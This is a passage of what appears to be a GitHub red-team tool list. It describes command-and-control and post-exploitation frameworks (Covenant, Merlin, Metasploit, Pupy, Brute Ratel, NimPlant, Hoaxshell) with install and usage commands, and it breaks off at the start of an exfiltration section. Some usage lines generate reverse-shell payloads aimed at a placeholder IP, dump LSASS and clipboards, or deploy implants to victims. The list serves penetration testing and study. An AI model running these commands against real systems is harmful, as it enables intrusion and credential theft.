href="https://github.com/cobbr/Covenant">Covenant</a></h3><a id="user-content-covenant" class="anchor" aria-label="Permalink: 🔙Covenant" href="#covenant"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Covenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.</p> <p dir="auto">It can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.</p> <p dir="auto"><strong>Install: (Dotnet Core)</strong></p> <p dir="auto">You can download dotnet core for your platform from <a href="https://dotnet.microsoft.com/download/dotnet-core/3.1" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Note:</strong> <em>After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant"><pre>git clone --recurse-submodules https://github.com/cobbr/Covenant <span class="pl-c1">cd</span> Covenant/Covenant</pre></div> <p dir="auto"><strong>Usage: (Dotnet Core)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="~/Covenant/Covenant > dotnet run warn: Microsoft.EntityFrameworkCore.Model.Validation[10400] Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development. WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated. Covenant has started! Navigate to https://127.0.0.1:7443 in a browser"><pre><span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> dotnet run warn: Microsoft.EntityFrameworkCore.Model.Validation[10400] Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development. WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated. Covenant has started<span class="pl-k">!</span> Navigate to https://127.0.0.1:7443 <span class="pl-k">in</span> a browser</pre></div> <p dir="auto"><strong>Install: (Docker)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Build the docker image: git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant ~/Covenant/Covenant > docker build -t covenant ."><pre><span class="pl-c"><span class="pl-c">#</span> Build the docker image:</span> git clone --recurse-submodules https://github.com/cobbr/Covenant <span class="pl-c1">cd</span> Covenant/Covenant <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker build -t covenant <span class="pl-c1">.</span></pre></div> <p dir="auto"><strong>Usage: (Docker)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run Covenant within the Docker container ~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant # Stop the container ~/Covenant/Covenant > docker stop covenant # Restart Covenant interactively ~/Covenant/Covenant > docker start covenant -ai"><pre><span class="pl-c"><span class="pl-c">#</span> Run Covenant within the Docker container</span> <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v <span class="pl-k"><</span>/absolute/path/to/Covenant/Covenant/Data<span class="pl-k">></span>:/app/Data covenant <span class="pl-c"><span class="pl-c">#</span> Stop the container</span> <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker stop covenant <span class="pl-c"><span class="pl-c">#</span> Restart Covenant interactively</span> <span class="pl-k">~</span>/Covenant/Covenant <span class="pl-k">></span> docker start covenant -ai</pre></div> <p dir="auto">Full installation and startup instructions can be found on the wiki <a href="https://github.com/cobbr/Covenant/wiki/Installation-And-Startup">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png"><img src="https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image from <a href="https://github.com/cobbr/Covenant">https://github.com/cobbr/Covenant</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Ne0nd0g/merlin">Merlin</a></h3><a id="user-content-merlin" class="anchor" aria-label="Permalink: 🔙Merlin" href="#merlin"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Merlin is an open-source post-exploitation framework that is designed to be used after a initial compromise of a system.</p> <p dir="auto">It is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.</p> <p dir="auto"><strong>Install:</strong></p> <ol dir="auto"> <li>Download the latest compiled version of Merlin Server from the <a href="https://github.com/Ne0nd0g/merlin/releases">releases</a> section</li> <li>Extract the files with 7zip using the x function The password is: merlin</li> <li>Start Merlin</li> <li>Configure a <a href="https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html" rel="nofollow">listener</a></li> <li>Deploy an agent. See <a href="https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html" rel="nofollow">Agent Execution Quick Start Guide</a> for examples</li> </ol> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="mkdir /opt/merlin;cd /opt/merlin wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64"><pre>mkdir /opt/merlin<span class="pl-k">;</span><span class="pl-c1">cd</span> /opt/merlin wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64</pre></div> <p dir="auto"><strong>Usage:</strong></p> <ol dir="auto"> <li>Ensure the Merlin server is running with a configured listener</li> <li>Download and deploy an agent to the victim</li> <li>Execute agent</li> </ol> <p dir="auto">For detailed usage information see the official Merlin <a href="https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html" rel="nofollow">wiki</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png"><img src="https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image from <a href="https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks" rel="nofollow">https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework</a></h3><a id="user-content-metasploit-framework" class="anchor" aria-label="Permalink: 🔙Metasploit Framework" href="#metasploit-framework"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Metasploit is an open-source framework for developing, testing, and using exploit code.</p> <p dir="auto">The Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.</p> <p dir="auto"><strong>Install: (Installer)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall"><pre>curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb <span class="pl-k">></span> msfinstall <span class="pl-k">&&</span> \ chmod 755 msfinstall <span class="pl-k">&&</span> \ ./msfinstall</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="/opt/metasploit-framework/bin/msfconsole"><pre>/opt/metasploit-framework/bin/msfconsole</pre></div> <p dir="auto">Full installation instructions can be found on the official <a href="https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html" rel="nofollow">wiki</a>.</p> <p dir="auto"><a href="https://www.rapid7.com/blog/tag/metasploit/" rel="nofollow">Rapid7 Metasploit blogs</a></p> <p dir="auto"><a href="https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp" rel="nofollow">Cheat sheet graphic</a></p> <p dir="auto"><a href="https://github.com/security-cheatsheet/metasploit-cheat-sheet">Nice command list</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png"><img src="https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://goacademy.io/how-to-install-metasploit-on-kali-linux/" rel="nofollow">https://goacademy.io/how-to-install-metasploit-on-kali-linux/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/n1nj4sec/pupy">Pupy</a></h3><a id="user-content-pupy" class="anchor" aria-label="Permalink: 🔙Pupy" href="#pupy"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.</p> <p dir="auto">It allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.</p> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy cd pupy python create-workspace.py -DG pupyw"><pre>sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv git clone --recursive https://github.com/n1nj4sec/pupy <span class="pl-c1">cd</span> pupy python create-workspace.py -DG pupyw</pre></div> <p dir="auto">Roll fix to fix the error:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo pip2 install rpyc==3.4.4"><pre>sudo pip2 install rpyc==3.4.4</pre></div> <p dir="auto">Start:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="export PATH=$PATH:~/.local/bin; pupysh pupyws/bin/pupysh"><pre><span class="pl-k">export</span> PATH=<span class="pl-smi">$PATH</span>:<span class="pl-k">~</span>/.local/bin<span class="pl-k">;</span> pupysh pupyws/bin/pupysh</pre></div> <p dir="auto"><em>Git install instructions used from <a href="https://kalitut.com/how-to-install-pupy/" rel="nofollow">here</a>.</em></p> <p dir="auto"><strong>Install: (Docker)</strong></p> <p dir="auto">For detailed docker and pupy installation instructions see the <a href="https://github.com/n1nj4sec/pupy/wiki/Installation">wiki</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Get help page for any builtin commands with -h >> sessions -h >> jobs -h >> run -h # Interact with session 1 >> sessions -i 1 # Run local command 'ls' >> !ls"><pre><span class="pl-c"><span class="pl-c">#</span> Get help page for any builtin commands with -h</span> <span class="pl-k">>></span> sessions -h <span class="pl-k">>></span> <span class="pl-c1">jobs</span> -h <span class="pl-k">>></span> run -h <span class="pl-c"><span class="pl-c">#</span> Interact with session 1</span> <span class="pl-k">>></span> sessions -i 1 <span class="pl-c"><span class="pl-c">#</span> Run local command 'ls'</span> <span class="pl-k">>></span> <span class="pl-k">!</span>ls</pre></div> <p dir="auto">Full usage information can be found on the <a href="https://github.com/n1nj4sec/pupy/wiki/Basic-Usage">wiki</a>.</p> <p dir="auto">The wiki contains good <a href="https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation">post exploitation information</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png"><img src="https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/n1nj4sec/pupy/wiki/Screenshots">https://github.com/n1nj4sec/pupy/wiki/Screenshots</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://bruteratel.com/" rel="nofollow">Brute Ratel</a></h3><a id="user-content-brute-ratel" class="anchor" aria-label="Permalink: 🔙Brute Ratel" href="#brute-ratel"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">BruteRatel is a great command and control (C4) framework created by <a href="https://twitter.com/NinjaParanoid" rel="nofollow">@NinjaParanoid</a>. The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.</p> <p dir="auto">The client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.</p> <p dir="auto">Some nice features:</p> <ul dir="auto"> <li>DNS Over HTTPS</li> <li>Indirect Syscalls</li> <li>Built-in Debugger To Detect EDR Userland Hooks</li> <li>MITRE graph integration</li> <li>Adversary TTP automation</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">To legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the <a href="https://bruteratel.com/pricing/" rel="nofollow">pricing page</a> for more information.</p> <p dir="auto">After purchase you can download the framework from <a href="https://bruteratel.com/tabs/download/" rel="nofollow">here</a> with your Activation Key and License User ID.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Loads a powershell script to memory which can be Invoked using psreflect psimport # Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock lock_input # Dumps user clipboard dumpclip # Enumerates basic domain information dcenum # Elevates user privileges to SYSTEM (Requires admin rights) get_system # Takes a screenshot of current desktop and stores it on the server screenshot # Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique shadowclone"><pre><span class="pl-c"><span class="pl-c">#</span> Loads a powershell script to memory which can be Invoked using psreflect</span> psimport <span class="pl-c"><span class="pl-c">#</span> Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock</span> lock_input <span class="pl-c"><span class="pl-c">#</span> Dumps user clipboard</span> dumpclip <span class="pl-c"><span class="pl-c">#</span> Enumerates basic domain information</span> dcenum <span class="pl-c"><span class="pl-c">#</span> Elevates user privileges to SYSTEM (Requires admin rights)</span> get_system <span class="pl-c"><span class="pl-c">#</span> Takes a screenshot of current desktop and stores it on the server</span> screenshot <span class="pl-c"><span class="pl-c">#</span> Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique</span> shadowclone</pre></div> <p dir="auto">Full commander terminal usage information can be found <a href="https://bruteratel.com/tabs/badger/badgers/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png"><img src="https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://bruteratel.com/" rel="nofollow">https://bruteratel.com/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/chvancooten/NimPlant">NimPlant</a></h3><a id="user-content-nimplant" class="anchor" aria-label="Permalink: 🔙NimPlant" href="#nimplant"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A light-weight first-stage C2 implant written in Nim.</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Lightweight and configurable implant written in the Nim programming language</li> <li>Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts</li> <li>Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables</li> <li>Easy deployment of more advanced functionality or payloads via <code>inline-execute</code>, <code>shinject</code> (using dynamic invocation), or in-thread <code>execute-assembly</code></li> <li>Comprehensive logging of all interactions and file operations</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl https://nim-lang.org/choosenim/init.sh -sSf | sh choosenim stable git clone https://github.com/chvancooten/NimPlant cd client nimble install -d pip3 install -r server/requirements.txt apt install mingw-w64"><pre>curl https://nim-lang.org/choosenim/init.sh -sSf <span class="pl-k">|</span> sh choosenim stable git clone https://github.com/chvancooten/NimPlant <span class="pl-c1">cd</span> client nimble install -d pip3 install -r server/requirements.txt apt install mingw-w64</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Generate payloads python .\NimPlant.py compile all # Start server python .\NimPlant.py server "><pre><span class="pl-c"><span class="pl-c">#</span> Generate payloads</span> python .<span class="pl-cce">\N</span>imPlant.py compile all <span class="pl-c"><span class="pl-c">#</span> Start server</span> python .<span class="pl-cce">\N</span>imPlant.py server </pre></div> <p dir="auto">Before running make sure to create the <code>config.tool</code> configuration file, more information can be found <a href="https://github.com/chvancooten/NimPlant#getting-started">here</a>.</p> <p dir="auto">Full usage information can be found <a href="https://github.com/chvancooten/NimPlant#usage">here</a>.</p> <p dir="auto"><a href="https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/" rel="nofollow">Blog - Building a C2 Implant in Nim - Considerations and Lessons Learned</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png"><img src="https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://casvancooten.com" rel="nofollow">https://casvancooten.com</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/t3l3machus/hoaxshell">Hoaxshell</a></h3><a id="user-content-hoaxshell" class="anchor" aria-label="Permalink: 🔙Hoaxshell" href="#hoaxshell"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/t3l3machus/hoaxshell cd ./hoaxshell sudo pip3 install -r requirements.txt chmod +x hoaxshell.py"><pre>git clone https://github.com/t3l3machus/hoaxshell <span class="pl-c1">cd</span> ./hoaxshell sudo pip3 install -r requirements.txt chmod +x hoaxshell.py</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Payload that utilizes Invoke-Expression (default) sudo python3 hoaxshell.py -s <your_ip> # Payload that writes and executes commands from a file sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1" # Encrypted shell session with a trusted certificate sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>"><pre><span class="pl-c"><span class="pl-c">#</span> Payload that utilizes Invoke-Expression (default)</span> sudo python3 hoaxshell.py -s <span class="pl-k"><</span>your_ip<span class="pl-k">></span> <span class="pl-c"><span class="pl-c">#</span> Payload that writes and executes commands from a file</span> sudo python3 hoaxshell.py -s <span class="pl-k"><</span>your_ip<span class="pl-k">></span> -x <span class="pl-s"><span class="pl-pds">"</span>C:\Users<span class="pl-cce">\\\$</span>env:USERNAME\.local\hack.ps1<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Encrypted shell session with a trusted certificate</span> sudo python3 hoaxshell.py -s <span class="pl-k"><</span>your.domain.com<span class="pl-k">></span> -t -c <span class="pl-k"><</span>/path/to/cert.pem<span class="pl-k">></span> -k <span class="pl-k"><</span>path/to/key.pem<span class="pl-k">></span></pre></div> <p dir="auto">Full usage documentation <a href="https://github.com/t3l3machus/hoaxshell#usage">here</a>.</p> <p dir="auto"><a href="https://www.youtube.com/watch?v=SEufgD5UxdU" rel="nofollow">Usage Demo - YouTube</a></p> <p dir="auto"><a href="https://github.com/t3l3machus/hoaxshell#av-bypass-pocs">Hoaxshell vs AV</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png"><img src="https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/t3l3machus/hoaxshell">https://github.com/t3l3machus/hoaxshell</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Exfiltration</h1><a id="user-content-exfiltration" class="anchor" aria-label="Permalink: Exfiltration" href="#exfiltration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/iagox86/dnscat2">Dnscat2</a></h3><a id="user-content-dnscat2" class="anchor" aria-label="Permalink: 🔙Dnscat2" href="#dnscat2"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 